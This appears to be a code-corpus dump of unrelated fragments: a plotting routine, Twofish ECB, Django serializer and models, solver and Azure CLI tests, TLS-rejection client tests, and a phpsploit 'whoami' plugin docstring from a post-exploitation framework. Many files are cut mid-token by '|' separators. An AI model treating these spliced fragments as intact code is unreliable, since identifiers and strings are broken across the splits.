clickY = event.ydata
tb = get_current_fig_manager().toolbar
#if ((self.axis is None) or (self.axis==event.inaxes)) and tb.mode=='':
if event.button==1 and tb.mode=='':
print "OverPlotting spectrum from point %i,%i" % (clickX,clickY)
self.plotspec(clickY,clickX,button=event.button,cube=True)
elif event.button==2:
print "Plotting spectrum from point %i,%i" % (clickX,clickY)
self.plotspec(clickY,clickX,button=event.button,cube=True,clear=True)
elif event.button==3:
print "Disconnecting GAIA-like tool"
self.gaiafig.canvas.mpl_disconnect(self.clickid)
else:
print "Call failed for some reason: "
print "event: ",event
def plotspec(self, i=0, j=0, cube=False, title=None,
clear=False, color=None, continuum=None,
axis=None, offset=None, scale=None, voff=None, vmin=None,
vmax=None, units=None, xunits=None, erralpha=None, plotpix=False,
errstyle='fill', autorefresh=None, button=None, **kwargs):
"""
Plot a spectrum
Originally written to plot spectra from data cubes, hence the i,j parameter
to specify the location in the cube
Now, cube defaults to False, but you can still pass in a data cube.
Inputs:
title,color, kwargs - semi-obvious plot-related comands
axis - You can pass in a Matplotlib axis instance and it will plot on that
clear - Clear the axis before plotting?
continuum - if you've already subtracted out a continuum, you can add
it back in (only if it is a constant offset). It will be included in
the spectrum
offset - Like continuum, but ONLY for plotting purposes. Will move the
plot vertically but will NOT include values in the .spectrum
scale - multiplicative factor to scale the data by (NOT for plotting
purposes; modifies spectrum)
voff - Shift the spectrum on the velocity axis by this amount
vmin,vmax - only plot within this range
(note tha
|
t these keywords passed to splat_1d MAY crop the spectrum)
units - units of th
|
e data. At the moment, no conversions are done
xunits - units of the Y axis. Can affect other procedures, like show_lines,
and some unit conversion (Hz to GHz) is done
erralpha - Transparency of the errorbars if plotted
errstyle - style of errorbars if plotted
plotpix - if set, will plot against a pixel (channel) axis instead of a
physical axis
autorefresh - automatically update the plot when fitting gaussians, labeling,
etc?
"""
if kwargs.has_key('fignum'): kwargs.pop('fignum') # HACK because I want __init__ to accept different kwargs
if kwargs.has_key('fig'): kwargs.pop('fig') # is there a better workaround?
if scale is not None: self.scale = scale
if units is not None: self.units = units
if xunits is not None: self.xunits= xunits
if voff is not None: self.voff = voff
if offset is not None: self.offset= offset
if continuum is not None: self.continuum= continuum
if color is not None: self.plotcolor=color
if erralpha is not None: self.erralpha= erralpha
if vmax is not None: self.vmax = vmax
if vmin is not None: self.vmin = vmin
if title is not None: self.title = title
if autorefresh is not None: self.autorefresh = autorefresh
if axis is None: axis=self.axis # allow spectrum to be plotted on other axis
if clear: axis.clear()
if plotpix:
self.vind = arange(self.cube.shape[0])
else:
self.vind = self.vconv(arange(self.cube.shape[0])) + self.voff
if kwargs.has_
|
hupf/passwordchest
|
src/loxodo/twofish/twofish_ecb.py
|
Python
|
gpl-2.0
| 2,538
| 0.003546
|
#
# Loxodo -- Password Safe V3 compatible Password Vault
# Copyright (C) 2008 Christoph Sommer <mail@christoph-sommer.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import twofish
class TwofishECB:
"""
Electronic codebook (ECB) Twofish operation mode.
"""
def __init__(self, key):
"""
Set the key to be used for en-/de-cryption.
"""
self.twofish = twofish.Twofish()
self.twofish.set_key(key)
def encrypt(self, plaintext):
"""
Encrypt the given string using Twofish ECB.
"""
if len(plaintext) % 16:
raise RuntimeError("Twofish plaintext length must be a multiple of 16")
ciphertext = ""
while len(plaintext) >= 16:
ciphertext += self.twofish.encrypt(plaintext[0:16])
plaintext = plaintext[16:]
return ciphertext
def decrypt(self, ciphertext):
"""
Decrypt the given string using Twofish ECB.
"""
if len(ciphertext) % 16:
raise RuntimeError("Twofish ciphertext length must be a multiple of 16")
plaintext = ""
while len(ciphertext) >= 16:
plaintext += self.twofish.decrypt(ciphertext[0:16])
ciphertext = ciphertext[16:]
return plaintext
def test_twofish_ecb():
__testkey = "Now Testing Crypto-Funct
|
ions...."
__testenc = "Passing nonsense through crypt-API, will then do assertion check"
__testdec = "\x71\xbf\x8a\xc5\x8f\x6c\x2d\xce\x9d\xdb\x85\x82\x5b\x25\xe3\x8d\xd8\x59\x86\x34\x28\x7b\x58\x06\xca\x42\x3d\xab\xb7\xee\x56\x6f\xd3\x90\xd6\x96\xd5\x94\x8c\x70\x38\x05\xf8\xdf\x92\xa4\x06\x2f\x32\x7f\xbd\xd7\x05\x41\x32\xaa\x60\xfd\x18\xf4\x42\x15\x15\x56"
assert TwofishECB(__testkey).decrypt(__testenc) == __testdec
assert TwofishECB(__testkey).encrypt(__t
|
estdec) == __testenc
test_twofish_ecb()
|
nycholas/ask-undrgz
|
src/ask-undrgz/django/core/serializers/xml_serializer.py
|
Python
|
bsd-3-clause
| 11,755
| 0.003063
|
"""
XML serializer.
"""
from django.conf import settings
from django.core.serializers import base
from django.db import models, DEFAULT_DB_ALIAS
from django.utils.xmlutils import SimplerXMLGenerator
from django.utils.encoding import smart_unicode
from xml.dom import pulldom
class Serializer(base.Serializer):
"""
Serializes a QuerySet to XML.
"""
def indent(self, level):
if self.options.get('indent', None) is not None:
self.xml.ignorableWhitespace('\n' + ' ' * self.options.get('indent', None) * level)
def start_serialization(self):
"""
Start serialization -- open the XML document and the root element.
"""
self.xml = SimplerXMLGenerator(self.stream, self.options.get("encoding", settings.DEFAULT_CHARSET))
self.xml.startDocument()
self.xml.startElement("django-objects", {"version" : "1.0"})
def end_serialization(self):
"""
End serialization -- end the document.
"""
self.indent(0)
self.xml.endElement("django-objects")
self.xml.endDocument()
def start_object(self, obj):
"""
Called as each object is handled.
"""
if not hasattr(obj, "_meta"):
raise base.SerializationError("Non-model object (%s) encountered during serialization" % type(obj))
self.indent(1)
self.xml.startElement("object", {
"pk" : smart_unicode(obj._get_pk_val()),
"model" : smart_unicode(obj._meta),
})
def end_object(self, obj):
"""
Called after handling all fields for an object.
"""
self.indent(1)
self.xml.endElement("object")
def handle_field(self, obj, field):
"""
Called to handle each field on an object (except for ForeignKeys and
ManyToManyFields)
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"type" : field.get_internal_type()
})
# Get a "string version" of the object's data.
if getattr(obj, field.name) is not None:
self.xml.characters(field.value_to_string(obj))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_fk_field(self, obj, field):
"""
Called to handle a ForeignKey (we need to treat them slightly
differently from regular fields).
"""
self._start_relational_field(field)
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
# If related object has a natural key, use it
related = related.natural_key()
# Iterable natural keys are rolled out as subelements
for key_value in related:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = getattr(related, field.rel.field_name)
self.xml.characters(smart_unicode(related))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_m2m_field(self, obj, field):
"""
Called to handle a ManyToManyField. Related objects are only
serialized as references to the object's PK (i.e. the related *data*
is not dumped, just the relation).
"""
if field.rel.through._meta.auto_created:
self._start_relational_field(field)
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
# If the objects in the m2m have a natural key, use it
def handle_m2m(value):
natural = value.natural_key()
# Iterable natural keys are rolled out as subelements
self.xml.startElement("object", {})
for key_value in natural:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
self.xml.endElement("object")
else:
def handle_m2m(value):
self.xml.addQuickElement("object", attrs={
'pk' : smart_unicode(value._get_pk_val())
})
for relobj in getattr(obj, field.name).iterator():
handle_m2m(relobj)
self.xml.endElement("field")
def _start_relational_field(self, field):
"""
Helper to output the <field> element for relational fields
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"rel" : field.rel.__class__.__name__,
"to" : smart_unicode(field.rel.to._meta),
})
class Deserializer(base.Deserializer):
"""
Deserialize XML.
"""
def __init__(self, stream_or_string, **options):
super(Deserializer, self).__init__(stream_or_string, **options)
self.event_stream = pulldom.parse(self.stream)
self.db = options.pop('using', DEFAULT_DB_ALIAS)
def next(self):
for event, node in self.event_stream:
if event == "START_ELEMENT" and node.nodeName == "object":
self.event_stream.expandNode(node)
return self._handle_object(node)
raise StopIteration
def _handle_object(self, node):
"""
Convert an <object> node to a DeserializedObject.
"""
# Look up the model using the model loading mechanism. If this fails,
# bail.
Model = self._get_model_from_node(node, "model")
# Start building a data dictionary from the object. If the node is
# missing the pk attribute, bail.
pk = node.getAttribute("pk")
if not pk:
raise base.DeserializationError("<object> node is missing the 'pk' attribute")
data = {Model._meta.pk.attname : Model._meta.pk.to_python(pk)}
# Also start building a dict of m2m data (t
|
his is saved as
# {m2m_accessor_attribute : [list_of_related_objects]})
m2m_data = {}
# Deseralize each field.
for field_node in node.getElementsByTagName("field"):
# If the field is missing the name attribute, bail (are you
# sensing a pattern here?)
field_
|
name = field_node.getAttribute("name")
if not field_name:
raise base.DeserializationError("<field> node is missing the 'name' attribute")
# Get the field from the Model. This will raise a
# FieldDoesNotExist if, well, the field doesn't exist, which will
# be propagated correctly.
field = Model._meta.get_field(field_name)
# As is usually the case, relation fields get the special treatment.
if field.rel and isinstance(field.rel, models.ManyToManyRel):
m2m_data[field.name] = self._handle_m2m_field_node(field_node, field)
elif field.rel and isinstance(field.rel, models.ManyToOneRel):
data[field.attname] = self._handle_fk_field_node(field_node, field)
else:
if field_node.getElementsByTagName('None'):
value = None
else:
value = field.to_python(getInnerText(field_node).strip())
data[field.name] = value
# Return a DeserializedObject so that the m2m data has a place to live.
return base.DeserializedObject(Model(**data), m2m_data)
def _handle_fk_field_node(self, node, field):
"""
Handle a <field> node for a ForeignKey
"""
# Check if the
|
lukeebhert/python_crash_course
|
Chapter_3/dinner_guests.py
|
Python
|
gpl-3.0
| 740
| 0.005405
|
invites = ['Queen Elizabeth II', 'Prince Philip','Duchess Kate','Prince William']
hell
|
o = "Your majesty "
message = ", you are invited to the Royal Dinner Party. \n- King George"
rsvp_qe = hello + invites[0] + message
rsvp_pp = hello + invites[1] + message
rsvp_dk = hello + invites[2] + message
rsvp_pw = hello + invites[3] + message
print(rsvp_qe)
print(rsvp_pp)
print(rsvp_dk)
print(rsvp_pw)
# Prince Philip cannot make it so
|
we are inviting Princess Margaret
print('\n' + invites[1] + ' cannot make it to the dinner')
invites[1] = 'Princess Margaret'
rsvp_pm = hello + invites[1] + message
print('\n' + rsvp_qe)
print(rsvp_pm)
print(rsvp_dk)
print(rsvp_pw)
print("\nThere are " + str(len(invites)) + " people invited to dinner.")
|
eomahony/Numberjack
|
tests/SolverTests.py
|
Python
|
lgpl-2.1
| 32,022
| 0.02339
|
'''
Numberjack is a constraint satisfaction and optimisation library
Copyright (C) 2009 Cork Constraint Computation Center, UCC
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
The authors can be contacted electronically at
numberjack.support@gmail.com
'''
import unittest
import sys
from Numberjack import *
from Mistral import Solver
class Test(unittest.TestCase):
def testVariable_backtrack(self):
'''
This is a quick test of the ability of the variable to backtrack properly
'''
# Removal test
var = Variable(list(range(0,10)))
assert(var.can_be_instantiated_to(5))
var.backtrack_stamp()
var.remove_value(5)
assert(not var.can_be_instantiated_to(5))
var.backtrack()
assert(var.can_be_instantiated_to(5))
# Assignment test
var = Variable(list(range(0,10)))
assert(not var.get_is_instantiated())
var.backtrack_stamp()
var.set_value(5)
assert(not var.can_be_instantiated_to(4))
assert(var.get_is_instantiated())
assert(var.get_value() == 5)
var.backtrack()
assert(not var.get_is_instantiated())
assert(var.can_be_instantiated_to(4))
def testEqual(self):
var1 = Variable([0])
var2 = Variable(list(range(0,1)))
model = NativeModel()
model.add_variable((var1, var2))
solver = Solver(model)
assert(solver.solve())
def testStupid_not_eq(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(NotEqual((var1, var2)))
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() != var2.get_value())
def testPropogationHandler(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
neq = NotEqual((var1, var2)).repr_con
neq.set_up_for_solver()
ph = Solving.PropogationHandler()
ph.add_to_stack(neq)
var1.set_propogation_handler(ph)
var2.set_propogation_handler(ph)
assert(len(ph._PropogationHandler__prop_stack) == 1)
var1.remove_value(1)
var2.remove_value(0)
assert(len(ph._PropogationHandler__prop_stack) == 1)
def testNot_eq_test2(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(NotEqual((var1, var2)))
model.add_constraint(NotEqual((var1, var3)))
model.add_constraint(NotEqual((var2, var3)))
bc = BasicConstraint([var1])
|
def bc_prop(obj):
vars = obj.get_variables()
if vars[0].get_is_instantiated() and vars[0].get_value() == 1:
obj.fail()
bc.rt_propogate = bc_prop
model.add_constraint(bc)
solver = Solver(model)
assert(solver.solve())
def testGEQ(self):
var1, var
|
2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Geq((var1, var2)))
model.add_constraint(Geq((var2, var3)))
model.add_constraint(Geq((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLEQ(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Leq((var1, var2)))
model.add_constraint(Leq((var2, var3)))
model.add_constraint(Leq((var1, var3)))
model.add_constraint(Equal((var1, var2)))
model.add_constraint(NotEqual((var2, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLT(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Lt((var1, var2)))
model.add_constraint(Lt((var2, var3)))
model.add_constraint(Lt((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testGT(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_variable((var1, var2, var3))
model.add_constraint(Gt((var1, var2)))
model.add_constraint(Gt((var2, var3)))
model.add_constraint(Gt((var1, var3)))
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testPlus(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(Equal((var1, Plus(var2, 3))))
solver = Solver(model)
assert(solver.solve())
#print "%d %d " % (var1.get_value(), var2.get_value())
def testMinus(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_variable((var1, var2))
model.add_constraint(Equal((var1, Minus(var2, 3))))
solver = Solver(model)
assert(solver.solve())
def testTimes(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testVariableBounds(self):
var = Variable(list(range(0,10)))
assert(var.get_lower() == 0)
assert(var.get_upper() == 9)
var.backtrack_stamp()
var.set_lower(4)
assert(var.get_lower() == 4)
assert(var.get_upper() == 9)
var.set_upper(6)
assert(var.get_lower() == 4)
assert(var.get_upper() == 6)
var.backtrack()
assert(var.get_lower() == 0)
assert(var.get_upper() == 9)
def testSum(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
var3 = Variable(list(range(3,5)))
model = NativeModel()
svar = Sum((var1, var2))
model.add_variable((var1, var2, var3, svar))
model.add_constraint(Equal((svar, var3)))
solver = Solver(model)
assert(solver.solve())
#svar.print_domain()
#var1.print_domain()
|
portfoliome/postpy
|
postpy/base.py
|
Python
|
mit
| 4,942
| 0
|
from collections import namedtuple
from foil.formatters import format_repr
from postpy.ddl import (
compile_column, compile_qualified_name, compile_primary_key,
compile_create_table, compile_create_temporary_table
)
__all__ = ('Database', 'Schema', 'Table', 'Column', 'PrimaryKey', 'View')
class Database:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE DATABASE %s;' % self.name
def drop_statement(self):
return 'DROP DATABASE IF EXISTS %s;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Schema:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE SCHEMA IF NOT EXISTS %s;' % self.name
def drop_statement(self):
return 'DROP SCHEMA IF EXISTS %s CASCADE;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Table(namedtuple('Table', 'name columns primary_key schema')):
"""Table statement formatter."""
__slots__ = ()
def __new__(cls, name: str, columns, primary_key, schema='public'):
return super(Table, cls).__new__(cls, name, columns,
primary_key,
schema)
def create_statement(self):
return compile_create_table(self.qualified_name,
self.column_statement,
self.primary_key_statement)
def drop_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.qualified_name)
def create_temporary_statement(self):
"""Temporary Table Statement formatter."""
return compile_create_temporary_table(self.name,
self.column_statement,
self.primary_key_statement)
def drop_temporary_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.name)
@property
def qualified_name(self):
return compile_qualified_name(self.name, schema=self.schema)
@property
def column_names(self):
return [column.name for column in self.columns]
@property
def primary_key_columns(self):
return self.primary_key.column_names
@property
def column_statement(self):
return ' '.join(c.create_statement() for c in self.columns)
@property
def primary_key_statement(self):
return self.primary_key.create_statement()
class Column(namedtuple('Column', 'name data_type nullable')):
__slots__ = ()
def __new__(cls, name: str, data_type: str, nullable=False):
return super(Column, cls).__new__(cls, name, data_type, nullable)
def create_statement(self):
return compile_column(self.name, self.data_type, self.nullable)
class PrimaryKey(namedtuple('PrimaryKey', ['column_names'])):
__slots__ = ()
def __new__(cls, column_names: list):
return super(PrimaryKey, cls).__new__(cls, column_names)
def create_statement(self):
return compile_primary_key(self.column_names)
class View:
"""Postgresql View statement formatter.
Attributes
----------
name : view name
statement: the select or join statement the view is based on.
"""
def __init__(self, name: str, statement: str):
self.name = name
self.statement = statement
def drop_statement(self):
return 'DROP VIEW IF EXISTS {};'.format(self.name)
def create_statement(self):
return 'CREATE VIEW {name} AS {statement};'.format(
name=self.name, statement=self.statement)
def make_delete_table(table: Table, delete_prefix='delete_from__') -> Table:
"""Table referencing a delete from using primary key join."""
name = delete_prefix + table.name
primary_key = table.primary_key
key_names = set
|
(primary_key.column_names)
columns = [column for column in table.columns if column.name in key_names]
table = Table(name, columns, primary_key)
return table
def split_qualified_name(qualified_name: str, schema='public'):
if '.' in qualified_name:
schema, table = qualified_name.split('.')
else:
table = qualified_name
return schema, table
def order_table_columns(table: Table, column_names: list) -> Table:
"""Record tab
|
le column(s) and primary key columns by specified order."""
unordered_columns = table.column_names
index_order = (unordered_columns.index(name) for name in column_names)
ordered_columns = [table.columns[i] for i in index_order]
ordered_pkey_names = [column for column in column_names
if column in table.primary_key_columns]
primary_key = PrimaryKey(ordered_pkey_names)
return Table(table.name, ordered_columns, primary_key, table.schema)
|
uberVU/mongo-oplogreplay
|
oplogreplay/__init__.py
|
Python
|
mit
| 39
| 0.025641
|
from oplogreplayer import O
|
plogRe
|
player
|
keybar/keybar
|
src/keybar/tests/test_client.py
|
Python
|
bsd-3-clause
| 4,080
| 0.001225
|
import os
import pytest
import requests
from keybar.client import TLS12SSLAdapter
from keybar.tests.helpers import LiveServerTest
from keybar.tests.factories.user import UserFactory
from keybar.tests.factories.device import (
AuthorizedDeviceFactory, PRIVATE_KEY, PRIVATE_KEY2)
from keybar.utils.http import InsecureTransport
def verify_rejected_ssl(url):
"""
The utility verifies that the url raises SSLError if the remote server
supports only weak ciphers.
"""
with pytest.raises(requests.exceptions.SSLError):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
session.get(url)
return True
@pytest.mark.django_db(transaction=True)
class TestTestClient(LiveServerTest):
def test_url_must_be_https(self):
client = self.get_client(None, None)
with pytest.raises(InsecureTransport):
client.get('http://fails.xy')
def test_simple_unauthorized(self):
user = UserFactory.create()
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, None)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
def test_simple_authorized(self):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 200
assert response.content == b'"{\\"dummy\\": \\"ok\\"}"'
def test_simple_wrong_device_secret(self, settings):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY2)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
assert response.json()['detail'] == 'Error decoding signature.'
def test_to_server_without_tls_10(self, allow_offline):
"""
Verify that connection is possible to SFDC servers that disabled TLS 1.0
"""
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://tls1test.salesforce.com/s/')
assert response.status_code == 200
def t
|
est_under_downgrade_attack_to_ssl_3(self, allow_offline):
"""
Verify that the connection is rej
|
ected if the remote server (or man
in the middle) claims that SSLv3 is the best supported protocol.
"""
url = 'https://ssl3.zmap.io/sslv3test.js'
assert verify_rejected_ssl(url)
def test_protocols_by_ssl_labs(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://www.ssllabs.com/ssltest/viewMyClient.html')
assert 'Your user agent has good protocol support' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_sni_suport(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://sni.velox.ch/')
assert 'sent the following TLS server name indication extension' in response.text
assert 'negotiated protocol: TLSv1.2' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_vulnerability_logjam_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10445/')
def test_vulnerability_freak_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10444/')
def test_vulnerability_osx_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10443/')
|
chandu-atina/User-Management
|
rfxapp/models.py
|
Python
|
mit
| 893
| 0.006719
|
from django.db import models
from django.utils import timezone
import datetime
# Create your models
|
here.
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self): # __unicode__ on Python 2
return self.question_text
def was_published_recently(self):
return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
was_published_recently.admin_order_field = 'pub_date'
was_published
|
_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
class Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self): # __unicode__ on Python 2
return self.choice_text
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/tests/test_command_registration.py
|
Python
|
mit
| 15,404
| 0.003635
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import logging
import unittest
from azure.cli.core.commands import _update_command_definitions
from azure.cli.core.commands import (
command_table,
CliArgumentType,
ExtensionCommandSource,
CliCommandArgument,
cli_command,
register_cli_argument,
register_extra_cli_argument)
from azure.cli.core.extension import EXTENSIONS_MOD_PREFIX
class Test_command_registration(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Ensure initialization has occurred correctly
import azure.cli.main
logging.basicConfig(level=logging.DEBUG)
@classmethod
def tearDownClass(cls):
logging.shutdown()
@staticmethod
def sample_vm_get(resource_group_name, vm_name, opt_param=None, expand=None, custom_headers=None, raw=False,
**operation_config):
"""
The operation to get a virtual machine.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
|
:type vm_name: str
:param opt_param: Used to verify reflection correctly
identifies optional params.
:type opt_param: object
:param expand: The expand expression to apply on the operation.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param boolean raw: returns the direct response alongs
|
ide the
deserialized response
:rtype: VirtualMachine
:rtype: msrest.pipeline.ClientRawResponse if raw=True
"""
pass
def test_register_cli_argument(self):
command_table.clear()
cli_command(None, 'test register sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__))
register_cli_argument('test register sample-vm-get', 'vm_name', CliArgumentType(
options_list=('--wonky-name', '-n'), metavar='VMNAME', help='Completely WONKY name...',
required=False
))
command_table['test register sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test register sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name', required=True),
'vm_name': CliArgumentType(dest='vm_name', required=False),
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['vm_name'].options_list, ('--wonky-name', '-n'))
def test_register_command(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_table['test command sample-vm-get'].load_arguments()
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name',
required=True,
help='The name of the resource group.'),
'vm_name': CliArgumentType(dest='vm_name',
required=True,
help='The name of the virtual machine.'),
'opt_param': CliArgumentType(required=False,
help='Used to verify reflection correctly identifies optional params.'), # pylint: disable=line-too-long
'expand': CliArgumentType(required=False,
help='The expand expression to apply on the operation.')
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['resource_group_name'].options_list,
['--resource-group-name'])
def test_register_command_from_extension(self):
command_table.clear()
# A standard command
cli_command(None, 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
self.assertEqual(command_table['hello world'].command_source, None)
command_table.clear()
# A command from an extension
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertFalse(cmd_source.overrides_command)
command_table.clear()
# A command from an extension that overrides the original command
cli_command(None, 'hello world', 'dummy_operation', None)
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertTrue(cmd_source.overrides_command)
command_table.clear()
def test_register_cli_argument_with_overrides(self):
command_table.clear()
global_vm_name_type = CliArgumentType(
options_list=('--foo', '-f'), metavar='FOO', help='foo help'
)
derived_vm_name_type = CliArgumentType(base_type=global_vm_name_type,
help='first modification')
cli_command(None, 'test vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-1',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-2',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_cli_argument('test', 'vm_name', global_vm_name_type)
register_cli_argument('test command', 'vm_name', derived_vm_name_type)
register_cli_argument('test command vm-get-2', 'vm_name', derived_vm_name_type,
help='second modification')
command_table['test vm-get'].load_arguments()
command_table['test command vm-get-1'].load_arguments()
command_table['test command vm-get-2'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 3,
'We expect exactly three commands in the command table')
command1 = command_table['test vm-get'].arguments['vm_name']
command2 = command_table['test command vm-get-1'].arguments['vm_name']
comma
|
nil0x42/phpsploit
|
plugins/system/whoami/plugin.py
|
Python
|
gpl-3.0
| 371
| 0
|
"""Print effectiv
|
e userid
SYNOPSIS:
whoami
DESCRIPTION:
Print the user name associated with current remote
server access rights.
* PASSIVE PLUGIN:
No requests are sent to server, as current user
is known by $USER environment variable (`env USER`);
AUTHOR:
nil0x42 <http://goo.gl/kb2wf>
"""
